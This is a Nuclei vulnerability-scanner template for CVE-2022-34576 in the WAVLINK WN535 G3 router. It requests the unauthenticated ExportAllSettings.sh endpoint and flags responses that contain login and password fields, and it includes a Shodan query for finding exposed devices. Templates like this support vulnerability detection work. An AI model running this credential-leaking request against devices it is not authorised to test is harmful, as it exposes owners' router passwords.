nuclei-templates/cves/2022/CVE-2022-34576.yaml

37 lines
955 B
YAML

id: CVE-2022-34576
info:
name: WAVLINK WN535 G3 - Access Control
author: arafatansari
severity: high
description: |
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
reference:
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-34576
classification:
cve-id: CVE-2022-34576
metadata:
verified: true
shodan-query: http.html:"Wavlink"
tags: cve,cve2022,wavlink,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
matchers-condition: and
matchers:
- type: word
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
- type: status
status:
- 200